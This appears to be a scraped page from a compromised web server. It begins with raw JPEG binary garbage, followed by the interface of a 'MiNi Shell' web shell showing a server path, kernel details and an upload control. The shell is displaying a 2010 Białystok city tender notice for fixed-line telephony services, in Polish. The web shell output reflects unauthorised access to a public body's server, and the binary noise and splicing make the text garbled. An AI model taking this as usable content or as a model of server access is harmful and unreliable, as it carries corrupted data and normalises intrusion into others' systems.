JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100709/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100709/182685-N-2010.html

<p class="kh_header"><b>Białystok: Świadczenie usług telekomunikacyjnych telefonii stacjonarnej dla Urzędu Miejskiego w Białymstoku</b><br>
<b>Numer ogłoszenia: 182685 - 2010; data zamieszczenia: 09.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Białystok , ul. Słonimska 1, 15-950 Białystok, woj. podlaskie, tel. 085 869 60 02, faks 085 869 62 65.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług telekomunikacyjnych telefonii stacjonarnej dla Urzędu Miejskiego w Białymstoku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Świadczenie usług telekomunikacyjnych z telefonów stacjonarnych w zakresie połączeń telefonicznych lokalnych, strefowych, międzystrefowych, międzynarodowych, do sieci komórkowych oraz usług faksowych na potrzeby Urzędu Miejskiego w Białymstoku, w następujących lokalizacjach:
- ul. Słonimska 1 
- ul. Słonimska 2/2
- ul. Warszawska 21
- ul. Kilińskiego 6 
- ul. Branickiego 9 
- ul. Waryńskiego 8 
- ul. Składowa 11 
- ul. Białówny 11
- ul. Ogrodowa 31
- ul. Waryńskiego 32A 

Usługi powinny być  świadczone w sposób ciągły i niezakłócony, z wykorzystaniem zewnętrznych łączy telekomunikacyjnych Wykonawcy ISDN PRA lub ISDN BRA. Ich liczba powinna zapewnić  Zamawiającemu  dostateczną,  jednorazową  liczbę równoczesnych połączeń telekomunikacyjnych.  

2. Zakres usług:
a)	Zachowanie dotychczasowego zakresu numeracji Zamawiającego tj. od nr 85-869-6000 do nr 85-869-6999, dodatkowa  rezerwacja 300 numerów w zakresie 85-869-7000 do 85-869-7299 do późniejszego wykorzystania (w celu zapewnienia spójności planu  numeracyjnego), Zamawiający informuje, że ww numery telefonów należą do firmy (MULTIMEDIA) POLSKA-POŁUDNIE S.A. ul. Tadeusza Wendy 7/9, 81-341 Gdynia,
b)	Zachowanie dotychczasowych numerów Zamawiającego tj. nr 85-664-74-35, 85-664-74-36, 85-664-7437 w lokalizacji przy ul. Waryńskiego 32A, numery należą do firmy (MNI0 S.A. ul. Potkanowska 54 A, 26-600 Radom,
c)	Wykonawca odpowiada za sprawne przejęcie wszystkich numerów od dotychczasowych operatorów oraz przygotowanie dokumentacji i uzyskanie wszelkich niezbędnych pozwoleń do realizacji przedmiotu zamówienia,
d)	Zamawiający nie dopuszcza do zmiany numeracji zewnętrznej i wewnętrznej,
e)	Zamawiający nie ponosi żadnych kosztów związanych z zachowaniem i przeniesieniem numerów telefonów,
f)	Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas  wykonywania przedmiotu zamówienia,
g)	 Zamawiający nie dopuszcza do zastosowania technologii alternatywnych tj. np.: VoIP, numery dostępowe, bramki GSM, 
h)	Zamawiający wymaga świadczenia usług wyłącznie drogą kablową, światłowodową lub radiową,
i)	Wykonawca zapewni sekundowe naliczanie opłat od momentu nawiązania połączenia do momentu zakończenia połączenia,
j)	 Wykonawca zapewni realizację bezpłatnych połączeń pomiędzy lokalizacjami Zamawiającego- stawka 0 zł,
k)	 Brak opłaty za niezrealizowane połączenia,
l)	 Brak opłaty za inicjację połączeń,
m)	 Realizacja połączeń bez konieczności wybierania numeru prefiks (wybieranie automatyczne),
n)	Wszystkie rodzaje połączeń i usług muszą dotyczyć również połączeń z innymi operatorami, bez naliczania dodatkowych opłat, 
o)	 Na wniosek Zamawiającego Wykonawca zapewni bezpłatną blokadę jak i jej usunięcie w zależności od potrzeb, dla połączeń zaczynających się od : 020x, 030x, 040x, 070x lub podobnych,
p)	Wykonawca zapewni bezpośrednie wybieranie numerów wewnętrznych - 4 cyfrowych, które są zakończeniem nr zewnętrznego dzięki cyfrowej centrali telefonicznej,
q)	Wykonawca będzie naliczał koszty połączeń wg stawek z formularza  cenowego  (zał. Nr 2 do SIWZ). Formularz cenowy stanowić będzie integralną część umowy, opłaty za świadczone usługi telefoniczne określone w formularzu cenowym nie mogą ulec podwyższeniu w trakcie trwania umowy,
r)	  Zamawiający wymaga by Wykonawca dostarczał bezpłatnie w cyklach miesięcznych pełne zestawienie bilingowe drogą elektroniczną w formacie Excel 2003 tzn. wykaz zrealizowanych wszystkich połączeń zawierających informację: o numerze z jakiego na jaki wykonano połączenie, datę, godzinę, czas trwania połączenia z dokładnością do 1 sekundy wraz z kosztami, w terminie do 14 dni roboczych od zakończenia cyklu rozliczeniowego,
s)	  Wykonawca zapewni na wniosek Zamawiającego umieszczenie bądź usunięcie na głównej centrali telefonicznej zapowiedzi melodyjnej Zamawiającego jako czas oczekiwania na połączenie bez dodatkowych opłat,
t)	Zamawiający zastrzega sobie prawo do wyłączania lub ponownej aktywacji numerów objętych zakresem zamówienia, w zależności od potrzeb. 

3. Sprzęt:
Wszystkie centrale telefoniczne wraz z osprzętem i oprogramowaniem są własnością dotychczasowego Wykonawcy i powinny być zastąpione przez fabrycznie nowe centrale lub max. 3 letnie nowego Wykonawcy, który dostarczy również aparaty systemowe (cyfrowe) różnych typów                   w tym:
- konsolę obsługującą stanowisko połączeń manualnych i informacyjnych,
- aparaty systemowe (cyfrowe) z funkcjami sekretarsko-dyrektorskimi z wyświetlaczem w ilości 40 szt.,
- aparaty systemowe (cyfrowe) z wyświetlaczem w ilości 109 szt..
W miarę rozbudowy centrali telefonicznej o porty cyfrowe Wykonawca zapewni na potrzeby Zamawiającego  aparaty systemowe (cyfrowe) z wyświetlaczem.  Centrale i aparaty systemowe będą własnością Wykonawcy.
W dniu dostawy aparatów systemowych (cyfrowych) strony podpiszą protokół odbioru w dwóch jednobrzmiących egzemplarzach. Protokół zawierał będzie następujące dane:
- datę dostawy,
- modele/typy aparatów telefonicznych,
- liczbę dostarczonych aparatów telefonicznych,
- oświadczenie o sprawności technicznej dostarczanych urządzeń wraz z homologacją.

Ilość numerów wewnętrznych Zamawiającego z podziałem na lokalizację w dniu sporządzania SIWZ

Lp.	Lokalizacje Zamawiającego	Ilość linii analogowych	Ilość linii   cyfrowych
1.		ul. Słonimska 1	230	80
2.		ul. Słonimska 2/2	38	7
3.		ul. Warszawska 21	15	6
4.		ul. Kilińskiego 6	6	-
5.		ul. Branickiego 9	120	11
6.		ul. Waryńskiego 8	40	9
7.		ul. Składowa 11	100	15
8.		ul. Białówny 11	90	3
9.		ul. Ogrodowa 31	6	-
10.		ul. Waryńskiego 32A	3	-


 4. Serwis, naprawa, konserwacja systemów telekomunikacyjnych, central oraz sieci telefonicznych i urządzeń końcowych w lokalizacjach Zamawiającego:
- ul. Słonimska 1
- ul. Słonimska 2/2
- ul. Warszawska 21 
- ul. Kilińskiego 6,
- ul. Branickiego 9 
- ul. Waryńskiego 8 
- ul. Składowa 11 
- ul. Białówny 11
- ul. Ogrodowa 31
- ul. Waryńskiego 32A 


A) kompleksowe przygotowanie do realizacji usług telekomunikacyjnych polegających między innymi  na:
1.	doprowadzenie sieci zewnętrznej,
2.	montaż central z osprzętem i oprogramowaniem,
3.	krosowanie numerów i aparatów (faksów) poprzez sieć wewnętrzną z centralą,
4.	płynne przeniesienie sieci numerów telefonów dotychczas wykorzystywanych przez Zamawiającego bez nieuzasadnionej przerwy w pracy, z zachowaniem numerów wewnętrznych w pomieszczeniach i lokalizacjach Zamawiającego,
5.	montaż aparatów systemowych (cyfrowych) na wszystkich liniach cyfrowych.

B) termin prac montażowych:
Prace montażowe powinny być wykonywane tak by zapewniona była nieprzerwana i niezakłócona łączność w godzinach pracy Zamawiającego tj. w dni powszednie pomiędzy godziną 7:30 a 15:30 (we wtorki od godz. 8:00 do 16:00) natomiast całkowite przełączenie wszystkich telefonów powinno nastąpić z czwartku (30.09.2010r.) na piątek (01.10.2010r) tak aby w piątek tj. 01.10.2010r. od godz. 0:00 działały wszystkie telefony wewnętrzne bez przerw w pracy.

C) pozostałe czynności serwisowe, naprawcze, konserwacyjne systemów telekomunikacyjnych, central oraz sieci telefonicznych i urządzeń końcowych:
1)	przegląd i konserwacja central telefonicznych i aparatów systemowych zgodnie z zaleceniami producenta,
2)	testowanie pracy central telefonicznych, sprawdzanie portów wewnętrznych i miejskich central,
3)	sprawdzenie doprowadzenia sygnałów od głowicy miejskiej do central telefonicznych,
4)	sprawdzanie doprowadzenia sygnałów  od central telefonicznych do urządzeń końcowych        (aparatów telefonicznych oraz telefaksów),
5)	wymiana uszkodzonych krosów na przełącznicach,
6)	sprawdzanie i konserwacja aparatów telefonicznych (poziomu słyszalności rozmów telefonicznych, działania dzwonków),
7)	naprawa na wniosek Zamawiającego aparatów systemowych (cyfrowych) Wykonawcy oraz zapewnienie na czas naprawy aparatu zastępczego,
8)	w przypadku konieczności, przeprowadzenie bezpłatnie instruktarzy stanowiskowych odnośnie obsługi aparatów systemowych (cyfrowych) oraz przekazaniu innych istotnych uwag w związku z wymianą sprzętu,
9)	konserwacja telefaksów i sprawdzanie jakości transmisji  telefaksowej,
10)	programowanie telefaksów i aparatów systemowych,
11)	wymiana i instalacja nowych aparatów telefonicznych, faksów zakupionych przez Zamawiającego,
12)	wykonanie i instalacja przedłużaczy telefonicznych,
13)	zmiana numeru analogowego na cyfrowy na wniosek Zamawiającego,
14)	zmiana numeru cyfrowego na analogowy na wniosek Zamawiającego,
15)	przeniesienie numerów wewnętrznych pomiędzy pokojami na wniosek Zamawiającego, 
16)	przeniesienie numerów wewnętrznych między centralami na wniosek Zamawiającego,
17)	instalacja nowych numerów wewnętrznych na wniosek Zamawiającego,
18)	przeprogramowywanie numerów,
19)	sprawdzanie i konserwacja linii miejskiej od przełącznic głównych do gniazda docelowego,
20)	wymiana uszkodzonych sznurów w aparatach telefonicznych,
21)	podłączenie telefonów do sieci za pomocą kabli zakończonymi wtykiem RJ45 (po stronie sieci),
22)	doprowadzenie kabla od gniazda sieci do urządzeń końcowych (aparatów, faksów) oryginalnego lub dłuższego od oryginału wraz z jego wykonaniem,
23)	za urządzenia, oprogramowanie i części zainstalowane podczas naprawy elementów central i pozostałych urządzeń nie przysługuje zwrot kosztów. Są one własnością Wykonawcy.
24)	wykonywanie ekspertyz  technicznych urządzeń końcowych (aparatów, faksów) na wniosek Zamawiającego, 
25)	w przypadku zmiany lokalizacji których z siedzib Zamawiającego (w obrębie tej samej strefy numeracyjnej) wymagane jest jej bezpłatne przeniesienie w miejsce wskazane przez Zamawiającego w nieprzekraczalnym terminie 7 dni od dnia pisemnego wezwania przez Zamawiającego, lub w przypadku braku możliwości technicznych dotrzymania w/w terminu, zapewnienia rozwiązania tymczasowego/zastępczego, umożliwiającego normalne funkcjonowanie Zamawiającego w ramach nowej lokalizacji,
26)	Wykonawca zapewni ciągły 24-godzinny dostęp do serwisu przez 7 dni w tygodniu i gwarantowany czas usunięcia awarii do 4 godzin od zgłoszenia - bez względu na godzinę zgłoszenia i dzień tygodnia, 
27)	zgłaszanie awarii odbywać się będzie drogą telefoniczną lub e-mailem, a przyjęcie zgłoszenia powinno być potwierdzone faksem lub drogą elektroniczną,
28)	Zamawiający zastrzega możliwość rozbudowy o porty analogowe i cyfrowe - tj. podłączenia dodatkowych numerów telefonów w ramach bieżących potrzeb Zamawiającego, koszt ewentualnej rozbudowy poniesie Wykonawca,
29)	Wykonawca zapewni w razie potrzeb blokadę prezentacji numeru (CLIR), 
30)	Wykonawca zapewni prezentację numeru (CLIP),
31)	Wykonawca zapewni możliwość przekierowywania rozmów przychodzących,
32)	Wykonawca zapewni możliwość przechwytywania rozmów przychodzących,
33)	Wykonawca zapewni całodobowy dostęp telefoniczny w celu zgłaszania uszkodzeń,
34)	Wykonawca zapewni indywidualnego opiekuna technicznego i handlowego na czas trwania umowy w celu zapewnienia bieżącej obsługi.

5. Informacje dodatkowe:
Zadaniem Wykonawcy jest również:
a)	konieczność zamieszczania i aktualizacji  wskazanych przez Zamawiającego numerów telefonicznych w Ogólnopolskiej Informacji o Numerach Telefonicznych, na numerze  118 913,
b)	dbanie aby baza danych z zamieszczonymi numerami w Ogólnopolskiej Informacji o Numerach Telefonicznych, na numerze  118 913 nie była wykasowana,
c)	zamieszczanie wskazanych numerów telefonicznych Zamawiającego w Ogólnopolskiej  Książce  Telefonicznej Numerów Abonenckich, zależnie od częstotliwości jej wydawania,
d)	informowanie Zamawiającego na bieżąco o planowanych wyjściach kolejnych edycji Książek Telefonicznych tak aby Zamawiający miał czas na zaktualizowanie numerów telefonicznych,
e)	zapewnienie dostawy Zamawiającemu tradycyjnych Ogólnopolskich  Książek  Telefonicznych Numerów Abonenckich w ilości min. 50 szt., lub zamiennie 30 szt. na nośnikach elektronicznych i 70 szt. tradycyjnych zgodnie z cyklami edycji.

6. Informacje do szacowania cen:
Średni miesięczny czas dotychczasowych połączeń wychodzących Zamawiającego w skali miesiąca to:
- 45 000 minut dla połączeń lokalnych,
- 7 500 minut dla połączeń międzystrefowych,
- 60 minut dla połączeń międzynarodowych,
- 2 000 minut dla połączeń do sieci komórkowych,
- 500 minut do sieci inteligentnych,
- 300 minut dla połączeń do numeracji skróconej Abonenckich Usług Specjalnych.
Informacje podane do szacowania cen są szacunkowe i mają służyć do zilustrowania ruchu telefonicznego. Natężenie wykonywanych połączeń może ulec zmianie w zależności od potrzeb Zamawiającego, czego Zamawiający nie mógł przewidzieć w chwili opracowywania SIWZ. Jednocześnie Wykonawcy nie będzie przysługiwało żadne roszczenie odszkodowawcze w przypadku zmniejszenia lub zwiększenia liczby wykonywanych połączeń i nie może to mieć wpływu na wzrost kosztów połączeń - cen jednostkowych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6) ustawy Prawo zamówień publicznych, polegających na powtórzeniu tego samego rodzaju zamówień,  o wartości nie większej niż 30 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 64.20.00.00-8, 50.33.00.00-7, 50.33.41.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Oferta musi być zabezpieczona wadium o wartości: 15.000,00 zł, (słownie: piętnaście tysięcy zł).
2.	Wadium może być wniesione w jednej lub kilku następujących formach:  
a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,  z tym, że poręczenia kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.).
Wadium wnoszone w formie pieniężnej należy wpłacić przelewem (tj. w formie bezgotówkowej) na rachunek bankowy w Banku KREDYT BANK S.A. II Oddział w Białymstoku nr 07 1500 1344 1213 4004 9891 0000, a dowód wpłaty wadium należy dołączyć do oferty. W tytule wpłaty należy wpisać: 
Wadium - Świadczenie usług telekomunikacyjnych telefonii stacjonarnej dla Urzędu Miejskiego w Białymstoku.
3.	Wadium wnoszone w pozostałych formach należy złożyć w kasie Urzędu Miejskiego w Białymstoku przy ul. Słonimskiej  1, pok. 21 (oryginał), a potwierdzenie wraz z kopią złożonego dokumentu należy załączyć do oferty. 
4.	Wadium musi być wniesione najpóźniej w terminie składania ofert zgodnie z Rozdz. X, pkt 1 SIWZ.
5.	Wykonawca, który nie wniesie wadium zostanie wykluczony z postępowania.
6.	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt. 11.
7.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego.
8.	Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert. 
9.	Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie pkt 7, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego. 
10.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złożył dokumentów lub oświadczeń potwierdzających spełnianie warunków udziału w postępowaniu lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
11.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:            
a) odmówił podpisania umowy na warunkach określonych w ofercie,
b) zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia  warunku Wykonawca winien przedłożyć zaświadczenia o wpisie do rejestru przedsiębiorców telekomunikacyjnych prowadzonego przez Prezesa Urzędu Komunikacji Elektronicznej - ustawa z dnia 16.07.2004 r. Prawo telekomunikacyjne (Dz.U. 2004 r. Nr 171,poz. 1800 z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu potwierdzenia spełnienia warunku wykonawca winien przedłożyć wykaz wykonanych a w przypadku świadczeń okresowych  lub ciągłych również wykonywanych zamówień w okresie ostatnich 3 lat przed upływem terminu składania ofert w niniejszym postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
 - co najmniej 3 zamówienia na świadczenie usług telekomunikacyjnych wraz z serwisem, naprawą i konserwacją  sieci i systemów telekomunikacyjnych na łączną wartość min. 500.000 PLN, w tym 1 zamówienie winno dotyczyć również świadczenia usług telefonicznych dla jednego klienta w zakresie minimum 4 traktów ISDN typu PRA (30B+D) i 8 traktów ISDN typu BRA (2B+D) lub równoważną ilością samych traktów BRA i PRA, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz z załączeniem dokumentu,  potwierdzającego, że prace zostały wykonane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:
a) każdy Wykonawca zobowiązany jest złożyć oddzielnie dokument określony w Rozdz. III.4.1) tiret 1, oraz Rozdz.III.4.2) tiret 2,
